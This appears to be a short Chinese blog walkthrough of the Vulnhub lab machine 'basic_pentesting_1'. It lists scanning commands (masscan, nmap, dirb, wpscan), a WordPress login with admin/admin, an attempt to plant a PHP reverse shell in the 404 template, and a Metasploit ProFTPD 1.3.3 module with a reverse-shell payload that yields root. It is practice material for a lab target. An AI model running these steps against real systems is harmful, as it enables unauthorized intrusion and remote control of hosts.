靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】

basic_pentesting_1【VX订阅号:0x00实验室】

arp-scan扫描靶机IP

masscan 192.168.253.153 --ports 0-65535 --rate=10000端口扫描

nmap扫描nmap -T5 -A -p- 192.168.253.153

21:ProFTPD 1.3.3

dirb http://192.168.253.153 目录扫描

http://192.168.253.153/secret/发现网站cms是wordpress

wpscan --url http://192.168.253.153/secret/

知道版本WordPress 4.9.24

msf没发现可利用漏洞

wpscan --url http://192.168.253.153/secret/ --enumerate u用户名枚举

admin/admin直接进来了

404界面写入phpshell

shell:反弹的phpwebshellphp-reverse-shell.php 默认目录及文件名/usr/share/webshells/php

把IP和port改成自己的,监听反弹

404监听不行,监听不到
WordPress 6.4.1

上传可以

在上传路径找到自己上传文件

换个方法

ftp端口开着

ProFTPD

搜索可利用模块search ProFTPD 1.3.3

设置payload,输入set payload cmd/unix/reverse、

设置目的地址和源地址

运行

获得root权限

相关推荐
网络安全-老纪26 分钟前
网络安全-js安全知识点与XSS常用payloads
javascript·安全·web安全
API_technology29 分钟前
电商API安全防护:JWT令牌与XSS防御实战
前端·安全·xss
xmweisi1 小时前
【华为】报文统计的技术NetStream
运维·服务器·网络·华为认证
VVVVWeiYee1 小时前
BGP配置华为——路径优选验证
运维·网络·华为·信息与通信
Tipray20061 小时前
天 锐 蓝盾终端安全管理系统:办公U盘拷贝使用管控限制
安全
yourkin6662 小时前
TCP...
服务器·网络·tcp/ip
ktkiko115 小时前
Websocket——心跳检测
网络·websocket·网络协议
坚定信念,勇往无前5 小时前
Spring Boot 如何保证接口安全
spring boot·后端·安全
GGGGGGGGGGGGGG.5 小时前
hapxory-ACL基础介绍及案例
运维·服务器·网络
H轨迹H5 小时前
Vulnhun靶机-kioptix level 4-sql注入万能密码拿到权限ssh连接利用mysql-udf漏洞提权
网络安全·渗透测试·vulnhub·靶机·web漏洞·oscp